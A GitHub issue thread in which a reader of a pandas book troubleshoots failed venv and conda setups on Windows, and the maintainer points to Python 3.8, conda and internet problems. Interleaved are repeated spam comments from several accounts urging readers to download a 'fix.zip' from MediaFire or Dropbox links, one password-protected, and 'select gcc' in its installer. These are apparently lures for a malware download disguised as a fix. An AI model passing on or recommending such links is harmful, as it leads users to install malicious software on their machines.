### ISSUE TITLE
launching the virtual environment and setting up libraries

### ISSUE THREAD

**Issue by Donarmando2** [stefmolin/Hands-On-Data-Analysis-with-Pandas-2nd-edition#49]
### Required attestation
- [x] I have **completely and exactly** followed the virtual environment setup instructions from the book and have consulted the [README](https://github.com/stefmolin/Hands-On-Data-Analysis-with-Pandas-2nd-edition#notes-on-environment-setup) for any updates.
- [x] I have cloned either this repository or my fork of this repository so that I have all necessary files on my local machine.
- [x] I have checked that this issue has not already been reported or resolved [here](https://github.com/stefmolin/Hands-On-Data-Analysis-with-Pandas-2nd-edition/issues?q=is%3Aissue+label%3Atroubleshooting).
- [x] I am aware that there is a [pre-built Binder environment](https://mybinder.org/v2/gh/stefmolin/binder-environments/2nd_edition?urlpath=git-pull%3Frepo%3Dhttps%253A%252F%252Fgithub.com%252Fstefmolin%252FHands-On-Data-Analysis-with-Pandas-2nd-edition%26urlpath%3Dlab%252Ftree%252FHands-On-Data-Analysis-with-Pandas-2nd-edition%252F%26branch%3Dmaster) that I can use, but I want to install locally on my machine instead.

---

##### 1. Which OS are you using?
TODO: Provide your OS here &ndash; make sure to differentiate between Intel and M1 chip Macs.

##### 2. Which Python version are you using?
TODO: Provide your Python version here.

##### 3. Are you using `conda` or `venv`?
TODO: Indicate whether you are using `conda` or `venv`.

---

### Commands run and their outputs
Please provide **all** of the commands you ran as well as the traceback:

<details>

```
TODO: paste commands and any traceback here
```

</details>

### Screenshots
Optionally, include any screenshots that will help diagnose the issue.

**Comment by Donarmando2** [comment]
1. Which OS are you using?   Windows10

2. Which Python version are you using?  3.11

3. Are you using conda or venv?  venv

'
'4.  see  all the setup  steps  here
[environment setup and recap.txt](https://github.com/user-attachments/files/16741404/environment.setup.and.recap.txt)

**Comment by Donarmando2** [comment]
i was able to launch Jupyter and it displays as shown inside the book...I follow instructions of page 48 to check out  my installation
See the results in enclosed file...
How to handle this  ?
![Setup checking](https://github.com/user-attachments/assets/e9a1ea05-b859-4ef9-9d11-2342720d9dbf)

**Comment by stefmolin** [comment]
Hi there – you mention that you are using Python 3.11, which is not supported. You need to use Python 3.8 otherwise some of the versions of the packages used in the book won't be available. 

From the output you shared your computer is missing some system libraries, which is preventing you from installing numpy and anything that relies on it so the installation of the dependencies failed on your machine. For this reason, I recommend that you, as a Windows user, use conda and not venv. Follow the directions for conda, and it will also set you up with the correct Python version.

**Comment by NimaJafariComp** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=0
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Donarmando2** [comment]
> Hi there – you mention that you are using Python 3.11, which is not supported. You need to use Python 3.8 otherwise some of the versions of the packages used in the book won't be available.
> 
> From the output you shared your computer is missing some system libraries, which is preventing you from installing numpy and anything that relies on it so the installation of the dependencies failed on your machine. For this reason, I recommend that you, as a Windows user, use conda and not venv. Follow the directions for conda, and it will also set you up with the correct Python version.

PS

Ok
i will go back to Conda section and try out........ and let you know.  Thanks for the update

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Donarmando2** [comment]
> Hi there – you mention that you are using Python 3.11, which is not supported. You need to use Python 3.8 otherwise some of the versions of the packages used in the book won't be available.
> 
> From the output you shared your computer is missing some system libraries, which is preventing you from installing numpy and anything that relies on it so the installation of the dependencies failed on your machine. For this reason, I recommend that you, as a Windows user, use conda and not venv. Follow the directions for conda, and it will also set you up with the correct Python version.

PS



# i create a folder HODAP_2 inside i save all the book files then i create the environment in the following steps


(base) C:\Users\user\Documents\HODAP_2>conda create --name my_env python=3.8
Retrieving notices: ...working... done
Channels:
 - conda-forge
 - defaults
Platform: win-64
Collecting package metadata (repodata.json): done
Solving environment: done

## Package Plan ##

  environment location: C:\Users\user\anaconda3\envs\my_env

  added / updated specs:
    - python=3.8


The following packages will be downloaded:

    package                    |            build
    ---------------------------|-----------------
    bzip2-1.0.8                |       h2466b09_7          54 KB  conda-forge
    libsqlite-3.46.0           |       h2466b09_0         856 KB  conda-forge
    libzlib-1.3.1              |       h2466b09_1          55 KB  conda-forge
    openssl-3.3.1              |       h2466b09_3         8.0 MB  conda-forge
    pip-24.2                   |     pyhd8ed1ab_0         1.2 MB  conda-forge
    python-3.8.19              |h4de0772_0_cpython        15.3 MB  conda-forge
    setuptools-72.2.0          |     pyhd8ed1ab_0         1.4 MB  conda-forge
    tk-8.6.13                  |       h5226925_1         3.3 MB  conda-forge
    vc-14.3                    |      h8a93ad2_20          17 KB  conda-forge
    vc14_runtime-14.40.33810   |      ha82c5b3_20         734 KB  conda-forge
    vs2015_runtime-14.40.33810 |      h3bf8584_20          17 KB  conda-forge
    wheel-0.44.0               |     pyhd8ed1ab_0          57 KB  conda-forge
    ------------------------------------------------------------
                                           Total:        31.0 MB

The following NEW packages will be INSTALLED:

  bzip2              conda-forge/win-64::bzip2-1.0.8-h2466b09_7
  ca-certificates    conda-forge/win-64::ca-certificates-2024.7.4-h56e8100_0
  libffi             conda-forge/win-64::libffi-3.4.2-h8ffe710_5
  libsqlite          conda-forge/win-64::libsqlite-3.46.0-h2466b09_0
  libzlib            conda-forge/win-64::libzlib-1.3.1-h2466b09_1
  openssl            conda-forge/win-64::openssl-3.3.1-h2466b09_3
  pip                conda-forge/noarch::pip-24.2-pyhd8ed1ab_0
  python             conda-forge/win-64::python-3.8.19-h4de0772_0_cpython
  setuptools         conda-forge/noarch::setuptools-72.2.0-pyhd8ed1ab_0
  tk                 conda-forge/win-64::tk-8.6.13-h5226925_1
  ucrt               conda-forge/win-64::ucrt-10.0.22621.0-h57928b3_0
  vc                 conda-forge/win-64::vc-14.3-h8a93ad2_20
  vc14_runtime       conda-forge/win-64::vc14_runtime-14.40.33810-ha82c5b3_20
  vs2015_runtime     conda-forge/win-64::vs2015_runtime-14.40.33810-h3bf8584_20
  wheel              conda-forge/noarch::wheel-0.44.0-pyhd8ed1ab_0
  xz                 conda-forge/win-64::xz-5.2.6-h8d14728_0


Proceed ([y]/n)? y


Downloading and Extracting Packages:


CondaError: Downloaded bytes did not match Content-Length
    url: https://conda.anaconda.org/conda-forge/win-64/python-3.8.19-h4de0772_0_cpython.conda
    target_path: C:\Users\user\anaconda3\pkgs\python-3.8.19-h4de0772_0_cpython.conda
    Content-Length: 16090293
    downloaded bytes: 719215

CondaError: Downloaded bytes did not match Content-Length
    url: https://conda.anaconda.org/conda-forge/win-64/python-3.8.19-h4de0772_0_cpython.conda
    target_path: C:\Users\user\anaconda3\pkgs\python-3.8.19-h4de0772_0_cpython.conda
    Content-Length: 16090293
    downloaded bytes: 719215



(base) C:\Users\user\Documents\HODAP_2>conda activate my_env

EnvironmentNameNotFound: Could not find conda environment: my_env
You can list all discoverable environments with `conda info --envs`.



(base) C:\Users\user\Documents\HODAP_2>conda info --envs
# conda environments:
#
                         C:\ProgramData\anaconda3
base                  *  C:\Users\user\anaconda3
pytorchenv               C:\Users\user\anaconda3\envs\pytorchenv


(base) C:\Users\user\Documents\HODAP_2>


I do not know what to do may be it is linked to the name(underscore)  i dont know i will try with another name and another folder

**Comment by Donarmando2** [comment]
> Hi there – you mention that you are using Python 3.11, which is not supported. You need to use Python 3.8 otherwise some of the versions of the packages used in the book won't be available.
> 
> From the output you shared your computer is missing some system libraries, which is preventing you from installing numpy and anything that relies on it so the installation of the dependencies failed on your machine. For this reason, I recommend that you, as a Windows user, use conda and not venv. Follow the directions for conda, and it will also set you up with the correct Python version.

PS

almost done...But how to handle the last error   ?
[conda 2 setup.txt](https://github.com/user-attachments/files/16750305/conda.2.setup.txt)

**Comment by Donarmando2** [comment]
not only that mistake i am unable to launch jupyter..........from conda environment........(all those steps i was able to go through witn pip  except  package setup)

**Comment by stefmolin** [comment]
Your latest issues are related to your Internet connection. Can you try doing this instead?

```
conda env create --file environment.yml
```
